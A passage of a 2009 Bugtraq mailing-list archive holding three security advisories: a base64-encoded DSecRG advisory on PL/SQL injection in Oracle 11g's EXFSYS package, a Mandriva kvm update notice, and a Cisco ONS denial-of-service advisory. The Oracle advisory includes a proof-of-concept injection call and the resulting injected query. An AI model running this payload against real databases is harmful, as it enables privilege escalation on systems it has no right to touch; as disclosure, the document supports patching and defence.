Ly90ZXN0c2VydmVyLmNvbTo3MDAxL3Jldmlld1NlcnZpY2UvQ2xpZW50U2VydmxldA0KaHR0
cDovL3Rlc3RzZXJ2ZXIuY29tOjcwMDEvcmV2aWV3U2VydmljZS9JbnRlcmNlcHRvckNsaWVu
dFNlcnZsZXQNCmh0dHA6Ly90ZXN0c2VydmVyLmNvbTo3MDAxL3Jldmlld1NlcnZpY2UvY3Jl
YXRlQXJ0aXN0X3NlcnZpY2UuanNwDQpodHRwOi8vdGVzdHNlcnZlci5jb206NzAwMS9yZXZp
ZXdTZXJ2aWNlL2NyZWF0ZUFydGlzdF9zZXNzaW9uLmpzcA0KDQpGaXggSW5mb3JtYXRpb24N
CioqKioqKioqKioqKioqKg0KDQpUaGlzIGlzIFNlY3VyaXR5LUluLURlcHRoIHZ1bG5lcmFi
aWxpdHksIGJlY2F1c2Ugd2FzIGZvdW5kIGluIHNhbXBsZXMuKGh0dHA6Ly93d3cub3JhY2xl
LmNvbS90ZWNobm9sb2d5L2RlcGxveS9zZWN1cml0eS9jcHUvY3B1ZmFxLmh0bSkgDQpWdWxu
ZXJhYmlsaXR5IGlzc3VlcyB0aGF0IHJlc3VsdCBpbiBzaWduaWZpY2FudCBtb2RpZmljYXRp
b24gb2YgT3JhY2xlIGNvZGUgb3IgZG9jdW1lbnRhdGlvbiBpbiBmdXR1cmUgcmVsZWFzZXMs
DQpidXQgYXJlIG5vdCBvZiBzdWNoIGEgY3JpdGljYWwgbmF0dXJlIHRoYXQgdGhleSBhcmUg
ZGlzdHJpYnV0ZWQgaW4gQ3JpdGljYWwgUGF0Y2ggVXBkYXRlcy4NCg0KDQpodHRwOi8vd3d3
Lm9yYWNsZS5jb20vdGVjaG5vbG9neS9kZXBsb3kvc2VjdXJpdHkvY3JpdGljYWwtcGF0Y2gt
dXBkYXRlcy9jcHVqYW4yMDA5Lmh0bWwgDQoNCg0KQ3JlZGl0cw0KKioqKioqKg0KT3JhY2xl
IGdpdmUgYSBjcmVkaXRzIGZvciBBbGV4YW5kZXIgUG9seWFrb3YgZnJvbSBEaWdpdGFsIFNl
Y3VyaXR5IENvbXBhbnkgaW4gU2VjdXJpdHktSW4tRGVwdGggcHJvZ3JhbSBvZiBDUFUgSmFu
dWFyeSAyMDA5Lg0KDQpodHRwOi8vd3d3Lm9yYWNsZS5jb20vdGVjaG5vbG9neS9kZXBsb3kv
c2VjdXJpdHkvY3JpdGljYWwtcGF0Y2gtdXBkYXRlcy9jcHVqYW4yMDA5Lmh0bWwgDQoNCg0K
QWJvdXQNCioqKioqDQoNCkRpZ2l0YWwgU2VjdXJpdHkgaXMgbGVhZGluZyBJVCBzZWN1cml0
eSBjb21wYW55IGluIFJ1c3NpYSwgcHJvdmlkaW5nIGluZm9ybWF0aW9uIHNlY3VyaXR5IGNv
bnN1bHRpbmcsIGF1ZGl0IGFuZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHNlcnZpY2VzLCByaXNr
IGFuYWx5c2lzIGFuZCBJU01TLXJlbGF0ZWQgc2VydmljZXMgYW5kIGNlcnRpZmljYXRpb24g
Zm9yIElTTy9JRUMgMjcwMDE6MjAwNSBhbmQgUENJIERTUyBzdGFuZGFyZHMuIERpZ2l0YWwg
U2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAgZm9jdXNlcyBvbiB3ZWIgYXBwbGljYXRpb24gYW5k
IGRhdGFiYXNlIHNlY3VyaXR5IHByb2JsZW1zIHdpdGggdnVsbmVyYWJpbGl0eSByZXBvcnRz
LCBhZHZpc29yaWVzIGFuZCB3aGl0ZXBhcGVycyBwb3N0ZWQgcmVndWxhcmx5IG9uIG91ciB3
ZWJzaXRlLg0KDQoNCkNvbnRhY3Q6CXJlc2VhcmNoIFthdF0gZHNlYyBbZG90XSBydQ0KCQlo
dHRwOi8vd3d3LmRzZWNyZy5ydSANCgkJaHR0cDovL3d3dy5kc2VjLnJ1DQoNCg0KDQoNCg0K
DQo------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="[DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="[DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt"

DQpEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIEFkdmlzb3J5CSNE
U0VDUkctMDktMDAzDQoNCg0KQXBwbGljYXRpb246CQkJT3JhY2xlIGRhdGFiYXNlIDExRyAN
ClZlcnNpb25zIEFmZmVjdGVkOgkJT3JhY2xlIDExLjEuMC42IGFuZCAxMC4yLjAuMSAgDQpW
ZW5kb3IgVVJMOgkJCWh0dHA6Ly9vcmFjbGUuY29tDQpCdWdzOgkJCQlQTC9TUUwgSW5qZWN0
aW9ucw0KRXhwbG9pdHM6CQkJWUVTDQpSZXBvcnRlZDoJCQkxNy4xMS4yMDA4DQpWZW5kb3Ig
cmVzcG9uc2U6CQkxOC4xMS4yMDA4DQpMYXN0IHJlc3BvbnNlOiAgICAgICAgICAgICAgICAg
IDI0LjExLjIwMDggICAgICAgICAgCQkJDQpEYXRlIG9mIFB1YmxpYyBBZHZpc29yeToJMTMu
MDEuMjAwOSANCkF1dGhvcnM6CQkJQWxleGFuZHIgUG9seWFrb3YNCgkJCQlEaWdpdGFsIFNl
Y3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIChyZXNlYXJjaCBbYXRdIGRzZWMgW2Rv
dF0gcnUpDQoNCg0KRGVzY3JpcHRpb24NCioqKioqKioqKioqDQoNCk9yYWNsZSBEYXRhYmFz
ZSAxMUcgdnVsbmVyYWJsZSB0byBQTC9TUUwgSW5qZWN0aW9uLg0KDQpWdWxuZXJhYmlsaXR5
IGZvdW5kIGluIEV4dGVuZGVkIGZpbHRlciBzeXN0ZW0gKEVYRlNZUykuDQoNCg0KDQpEZXRh
aWxzDQoqKioqKioqDQoNClBML1NRTCBJbmplY3Rpb24gZm91bmQgaW4gcHJvY2VkdXJlIEVY
RlNZUy5EQk1TX0VYUEZJTF9EUi5HRVRfRVhQUlNFVF9TVEFUUyAobWF5YmUgb3RoZXIgZnVu
Y3Rpb25zIGluIHRoaXMgcGFja2FnZSkNClByb2NlZHVyZSBFWEZTWVMuREJNU19FWFBGSUxf
RFIuR0VUX0VYUFJTRVRfU1RBVFMgZXhlY3V0ZXMgd2l0aCByaWdodHMgb2YgdXNlciAgRVhG
U1lTLg0KDQpJZiBBdHRhY2tlciBoYXZlIGFjY2VzcyAgdG8gRVhGU1lTLkRCTVNfRVhQRklM
X0RSLkdFVF9FWFBSU0VUX1NUQVRTLiBoZSBjYW4gZG8gYWxsIHRoaW5ncyB3aXRoIEVYRlNZ
UyB1c2VyIHJpZ2h0czsNCkJ5IGRlZmF1bHQgdXNlciBFWEZTWVMgaGF2ZSBwcml2ZWxlZ2Ug
ICJDUkVBVEUgTElCUkFSWSIgIGFuZCAiQ1JFQVRFIEFOWSBUUklHR0VSIi4gU28gaGUgdGVv
cmV0aWNhbGx5IGNhbiBnZXQgYWNjZXNzIHRvIE9TLg0KDQoNCml0IGNhbiBvbmx5IGJlIGV4
cGxvaXRlZCBieSBhbiBhdHRhY2tlciB3aG8gaXMgZWl0aGVyIHJ1bm5pbmcgYXMgYSBwcml2
aWxlZ2VkIHVzZXJzLCBlLmcuIGFzIEVYRlNZUw0Kb3IgU1lTLCBvciBvbiBhIHN5c3RlbSB3
aGVyZSBhY2Nlc3MgdG8gdGhlIEVYRlNZUyByb3V0aW5lcyBoYXMgYmVlbiBncmFudGVkIHRv
IHVucHJpdmlsZWdlZCB1c2VycyBzbyB0aGlzIGENCmRlZmVuc2UgaW4gZGVwdGggaXNzdWUu
DQoNCg0KRVhGU1lTLkRCTVNfRVhQRklMX0RSLkdFVF9FWFBSU0VUX1NUQVRTICBoYXMgNCBw
YXJhbWV0ZXJzIA0KDQpUQUJfT1dORVINClRBQl9OQU1FDQpFWFBfQ09MVU1ODQpBU0VUX05N
DQoNCiJBU0VUX05NIiBpcyB2dWxuZXJhYmxlIHRvIFNRTCBJbmplY3Rpb24NCg0KDQoNCg0K
RXhhbXBsZToNCioqKioqKioNCg0KZXhlYyBFWEZTWVMuREJNU19FWFBGSUxfRFIuR0VUX0VY
UFJTRVRfU1RBVFMoJ0VYRlNZUycsJ0VYRiRWRVJTSU9OJywnRVhGVkVSDQpTSU9OJywnWVlZ
WVlZWScnIGFuZCAxPUVWSUxQUk9DKCktLScpDQoNCg0KDQpWdWxuZXJhYmxlIFJlcXVlc3Qg
aW4gdiRzcWwgbG9nIGZpbGUNCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
DQoNCg0KU0VMRUNUIGF0dHJpYnV0ZSwgZGF0YV90eXBlIGZyb20gIEFETV9FWFBGSUxfQVRU
UklCVVRFUyB3aGVyZSBvd25lciA9ICdFWEZTWVMnIGFuZCANCmF0dHJpYnV0ZV9zZXRfbmFt
ZSA9ICdZWVlZWVlZJyBhbmQgRVZJTFBST0MoKT1FVklMUFJPQygpLS0nIGFuZCB0YWJsZV9h
bGlhcyA9ICAnTk8nICBhbmQgKGRhdGFfdHlwZSBsaWtlICdWQVJDSEFSKCUpJyBvciBkYXRh
X3R5cGUgbGlrZSAnVkFSQ0hBUjIoJSknICANCm9yIGRhdGFfdHlwZSA9ICdJTlQnIG9yIGRh
dGFfdHlwZSA9ICdJTlRFR0VSJyBvciAgZGF0YV90eXBlID0gJ05VTUJFUicgb3IgZGF0YV90
eXBlID0gJ0RBVEUnKQ0KDQoNCkZpeCBJbmZvcm1hdGlvbg0KKioqKioqKioqKioqKioqDQoN
ClRoaXMgaXMgU2VjdXJpdHktSW4tRGVwdGggdnVsbmVyYWJpbGl0eS4oaHR0cDovL3d3dy5v
cmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NwdS9jcHVmYXEuaHRtKQ0K
VnVsbmVyYWJpbGl0eSBpc3N1ZXMgdGhhdCByZXN1bHQgaW4gc2lnbmlmaWNhbnQgbW9kaWZp
Y2F0aW9uIG9mIE9yYWNsZSBjb2RlIG9yIGRvY3VtZW50YXRpb24gaW4gZnV0dXJlIHJlbGVh
c2VzLA0KYnV0IGFyZSBub3Qgb2Ygc3VjaCBhIGNyaXRpY2FsIG5hdHVyZSB0aGF0IHRoZXkg
YXJlIGRpc3RyaWJ1dGVkIGluIENyaXRpY2FsIFBhdGNoIFVwZGF0ZXMuDQoNCg0KaHR0cDov
L3d3dy5vcmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBh
dGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1sIA0KDQoNCg0KQ3JlZGl0cw0KKioqKioqKg0K
DQpPcmFjbGUgZ2l2ZSBhIGNyZWRpdHMgZm9yIEFsZXhhbmRlciBQb2x5YWtvdiBmcm9tIERp
Z2l0YWwgU2VjdXJpdHkgQ29tcGFueSBpbiBTZWN1cml0eS1Jbi1EZXB0aCBwcm9ncmFtIG9m
IENQVSBKYW51YXJ5IDIwMDkuDQoNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNobm9sb2d5
L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDkuaHRt
bCANCg0KDQoNCg0KQWJvdXQNCioqKioqDQoNCkRpZ2l0YWwgU2VjdXJpdHkgaXMgbGVhZGlu
ZyBJVCBzZWN1cml0eSBjb21wYW55IGluIFJ1c3NpYSwgcHJvdmlkaW5nIGluZm9ybWF0aW9u
IHNlY3VyaXR5IGNvbnN1bHRpbmcsIGF1ZGl0IGFuZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHNl
cnZpY2VzLCByaXNrIGFuYWx5c2lzIGFuZCBJU01TLXJlbGF0ZWQgc2VydmljZXMgYW5kIGNl
cnRpZmljYXRpb24gZm9yIElTTy9JRUMgMjcwMDE6MjAwNSBhbmQgUENJIERTUyBzdGFuZGFy
ZHMuIERpZ2l0YWwgU2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAgZm9jdXNlcyBvbiB3ZWIgYXBw
bGljYXRpb24gYW5kIGRhdGFiYXNlIHNlY3VyaXR5IHByb2JsZW1zIHdpdGggdnVsbmVyYWJp
bGl0eSByZXBvcnRzLCBhZHZpc29yaWVzIGFuZCB3aGl0ZXBhcGVycyBwb3N0ZWQgcmVndWxh
cmx5IG9uIG91ciB3ZWJzaXRlLg0KDQoNCkNvbnRhY3Q6CXJlc2VhcmNoIFthdF0gZHNlYyBb
ZG90XSBydQ0KCQlodHRwOi8vd3d3LmRzZWNyZy5ydSANCgkJaHR0cDovL3d3dy5kc2VjLnJ1
DQoNCg0KDQoNCg0KDQoNCg0K
------------BBCA1ED38A711B4--


From - Wed Jan 14 13:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058de
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39166-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7EE13EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:39:35 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 656F32373BE; Wed, 14 Jan 2009 09:17:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25564 invoked from network); 14 Jan 2009 05:27:07 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=EKBufSk_EuGl58KlfjUA:9 a=IcExLSFhFvKvyMFPllwA:7 a=PFJxnJKnbqrnCZpBqJX4TsXuAMwA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:009 ] kvm
Date: Tue, 13 Jan 2009 22:57:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMykP-0004lZ-18@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:009
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kvm
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of kvm version 79 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 acdff9c09970bba49f5b500723092f2b  2009.0/i586/kvm-74-3.1mdv2009.0.i586.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b84f9ff6c8005e7de6996b3e1f04335d  2009.0/x86_64/kvm-74-3.1mdv2009.0.x86_64.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVRimqjQ0CJFipgRAoEPAJ0dZtxXkpX7Ft2YHREKrePd7QV9WgCg827W
ha/fMpm4QxG0vwCrbHMLjK4=iT86
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058df
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39175-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 97972EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:43:40 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id EF511143932; Wed, 14 Jan 2009 09:34:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3081 invoked from network); 14 Jan 2009 15:57:04 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco ONS Platform Crafted Packet Vulnerability
Date: Wed, 14 Jan 2009 17:00:00 +0100
Message-id: <200901141701.ons@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco ONS Platform Crafted Packet
Vulnerability

Advisory ID: cisco-sa-20090114-ons

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
The Cisco ONS 15300 series Edge Optical Transport Platform, the Cisco
ONS 15454 Optical Transport Platform, the Cisco ONS 15454 SDH
Multiservice Platform, and the Cisco ONS 15600 Multiservice Switching
Platform contains a vulnerability when processing TCP traffic streams
that may result in a reload of the device control card.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds that mitigate this vulnerability. Several
mitigations exist that can limit the exposure of this vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Affected Products
================
Vulnerable Products
+------------------

The following Cisco ONS products are vulnerable if running affected
software versions:

  * Cisco ONS 15310-CL and 15310-MA
  * Cisco ONS 15327
  * Cisco ONS 15454 and 15454 SDH
  * Cisco ONS 15600

Consult the section "Software Versions and Fixes" within this
advisory for affected software versions. To determine your software
version, view the Help > About window on the CTC management
software).

Products Confirmed Not Vulnerable
+--------------------------------

The following Cisco ONS products are confirmed not vulnerable:

  * Cisco ONS 15800 Series
  * Cisco ONS 15500 Series Extended Service Platform
  * Cisco ONS 15302
  * Cisco ONS 15305
  * Cisco ONS 15200 Series Metro DWDM Systems
  * Cisco ONS 15190 Series IP Transport Concentrator

No other Cisco products are currently known to be affected by this
vulnerability.

Details
======
The affected Cisco 15310-CL, 15310-MA, ONS 15327, ONS 15454, ONS
15454 SDH, and ONS 15600 hardware is managed through the CTX,
CTX2500, XTC, TCC/TCC+/TCC2/TCC2P, TCCi/TCC2/TCC2P, and TSC control
cards respectively. These control cards are usually connected to a
Data Communications Network (DCN). In this context the term DCN is
used to denote the network that transports management information
between a management station and the network entity (NE). This
definition of DCN is sometimes referred to as Management
Communication Network (MCN). The DCN is usually physically or
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.

A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.

The timing for the data channels traversing the switch is provided by
the control cards.

When an active and a standby Cisco ONS 15310-MA, ONS 15310-CL, ONS
15327, ONS 15454 or ONS 15454 SDH control card reloads at the same
time, the synchronous data channels traversing the switch drop
traffic until the card comes back online. Asynchronous data channels
traversing the switch are not impacted. Manageability functions
provided by the network element using the CTX, CTX2500, XTC or TCC/
TCC+/TCC2/TCC2P control cards are not available until the control
card comes back online.

On the Cisco ONS 15600 hardware, whenever both the active and standby
control cards are rebooting at the same time, there is no impact to
the data channels traversing the switch because the TSC performs a
software reset which does not impact the timing being provided by the
TSC for the data channels.

Manageability functions provided by the network element through the
TSC control cards are not available until the control card comes back
online.

This vulnerability is documented in Cisco bug ID CSCsr41128 
and has been assigned Common Vulnerabilities and Exposures (CVE) 
identifier CVE-2008-3818.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CVSS Base Score - 7.8

  Access Vector         : Network
  Access Complexity     : Low
  Authentication        : None
  Confidentiality Impact: None
  Integrity Impact      : None
  Availability Impact   : Complete

CVSS Temporal Score - 6.4

  Exploitability        : Functional
  Remediation Level     : Official-Fix
  Report Confidence     : Confirmed

Impact
=====
Successful exploitation of this vulnerability will result in a reset
of the node's control card. Repeated attempts to exploit this
vulnerability could result in a sustained DoS condition, dropping the
synchronous data channels traversing the switch (Cisco ONS 15310-MA,
ONS 15310-CL, ONS 15327, ONS 15454, ONS 15454 SDH) and preventing
manageability functions provided by the network element control cards
(all ONS switches) until the control card comes back online.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

+-------------------------------------------------------------------------+
| Affected Major Release          | First Fixed Release                   |
|---------------------------------+---------------------------------------|
| 7.0                             | Note: Releases prior to 7.0.2 are not |
|                                 | vulnerable. First fixed in 7.0.7      |
|---------------------------------+---------------------------------------|
| 7.2                             | Note: Releases prior to 7.2.2 are not |
|                                 | vulnerable. First fixed in 7.2.3      |
|---------------------------------+---------------------------------------|
| 8.0                             | Vulnerable; migrate to 8.5.3 or       |
|                                 | later.                                |
|---------------------------------+---------------------------------------|
| 8.5                             | Note: Releases prior to 8.5.1 are not |
|                                 | vulnerable. First fixed in 8.5.3      |
|---------------------------------+---------------------------------------|
| 9.0                             | Not vulnerable.                       |
+-------------------------------------------------------------------------+

Note: Releases prior to 7.0 are not affected by this vulnerability.

Workarounds
==========
There are no workarounds for this vulnerability. The following
general mitigation actions help prevent remote exploitation:

  * Isolate DCN:
    Ensuring the DCN is physically or logically separated from the
    customer network and isolated from the Internet will limit the
    exposure to the exploitation of these vulnerabilities from the
    Internet or customer networks.
  * Apply Transit Access Control Lists:
    Apply access control lists (ACLs) on routers / switches /
    firewalls installed in front of the vulnerable network devices
    such that TCP/IP traffic destined for the CTX, CTX2500, XTC, TCC2
    /TCC2+/TCC2P, or TSC control cards on the ONS is allowed only
    from the network management workstations.
    For examples on how to apply ACLs on Cisco routers, refer to the
    white paper "Transit Access Control Lists: Filtering at Your
    Edge", which is available at the following link: 
    http://www.cisco.com/en/US/customer/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link: 
http://www.cisco.com/warp/public/707/cisco-amb-20090114-ons.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized 
telephone numbers, and instructions and e-mail addresses for use in
various languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was found by reviewing Cisco TAC service requests.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC5MACgkQ86n/Gc8U/uCIiwCfb0TgaYDql8VEjtERKMaqgHOm
h0oAniEObgEKjHbo+CHnJxfFFKhCr17o
=7xLg
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39167-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
